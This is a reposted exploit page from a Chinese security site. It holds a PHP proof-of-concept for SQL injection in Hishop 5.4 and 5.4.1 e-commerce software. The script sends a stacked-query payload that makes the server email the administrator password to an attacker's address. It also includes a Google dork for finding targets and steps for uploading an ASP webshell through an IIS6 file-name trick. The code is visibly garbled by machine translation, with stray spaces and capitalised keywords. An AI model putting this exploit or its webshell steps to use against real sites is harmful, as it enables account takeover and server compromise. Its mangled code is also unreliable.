首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Hishop 5.4 & 5.4.1 SQL injection 来源：vfocus.net 作者：Hacker-Fire 发布时间：2012-04-09   ################################################## # Exploit Title: [Hishop 5.4 & 5.4.1 SQL injection] # Date: [06-04-2012] # Author: [Hacker-Fire] # Vendor or Software Link: [http://www.hishop.com.cn/bbs/thread-htm-fid-13.html] # Version: [ 5.4 & 5.4.1 ] # Category:: [ webapps] # Google dork: [intext:Hishop 5.4] # Tested on: [Windows 7 ] ################################################## [~] P0c [~] : <? Php print_r (' + ------------------------- + Hishop 5.4 & 5.4.1 SQL injection the exploit By: Hacker-Fire + ------------------------- + '); if ($ argc <3) { print_r (' + ------------------------- + Usage: php '. $ Argv [0].' Host Port Path RegMail Example: php '. $ argv [0].' localhost 80 / SHOES/category-92.aspx? valueStr = 35_0 ​​syc@myclover.org + ------------------------- + '); exit; } $ Host = $ argv [1]; $ Port = $ argv [2]; $ Path = $ argv [3]; $ Mail = $ argv [4]; $ Expdata = ""; for ($ i = 0; $ i <strlen ($ mail); $ i + +) $ Expdata = $ expdata. Dechex (ord ($ mail [$ i])). "00"; $ Expdata = strtoupper ($ expdata); $ Expdata = "% 27)% 20or% 201 = 1; DECLARE% 20 @ S% 20NVARCHAR (4000)% 20SET% 20 @ S = CAST (". $ Expdata. "2700% 20AS% 20NVARCHAR (4000))% 20EXEC (S); - "; GET ($ host, $ port, $ path, $ expdata, 30); function GET ($ host, $ port, $ path, $ data, $ timeout, $ cookie = ") { $ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, 30); if (! $ fp) { echo "{$ the errstr} ({$ errno is}) <br /> \ n"; exit; } $ Out = "GET $ path $ data HTTP/1.1 \ r \ n"; $ Out. = "The Host: $ host: $ port \ r \ n"; $ Out. = "The Connection: CLOSE \ r \ n \ r \ n \ r \ n"; fwrite ($ fp, $ out); while (! feof ($ fp)) { fgets ($ fp, 128); } fclose ($ fp); } print_r (' + ------------------------- + [+] Get Manager, the Password [1] to [landing] - "[My Account] -" [personal information】 [2] E-mail the administrator password. [3] the Good Luck! + ------------------------- + [+] Get the WebShell (the IIS6) Log in from [1] / admin / [commodity management] - "[Category template set】 [2] the upload 1.asp;. Html [3] the Shell Address: http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;. Html + ------------------------- + '); ?> ########################################################## [»] Greetz to :                      [ TrOon,Aghilas,r00t_dz,EliteTorjan,Vaga-hacker,xConsole,OverDz ] [ & -> Th3 Viper,BriscO-Dz,LaMiN Dk, xV!rus , black hool ]             [ And all my Freinds + Algerian Hackers ]        ##########################################################   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·discuz! X1.0 - X1.5 Blind SQL ·一次简单的POST注入测试 ·RealPlayer (.avi) Null Pointer ·CastRipper [.m3u] 2.9.6 stack ·Play [EX] 2.1 Playlist File (M ·Snort 2 DCE/RPC preprocessor B ·Distinct TFTP Server <= 3.01 D ·Dolibarr ERP & CRM 3 Post-Auth ·AnvSoft Any Video Converter 4. ·Mini-stream RM-MP3 Converter v ·BulletProof FTP Client 2010 - ·WM Downloader 3.0.0.9 (.pls) B   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved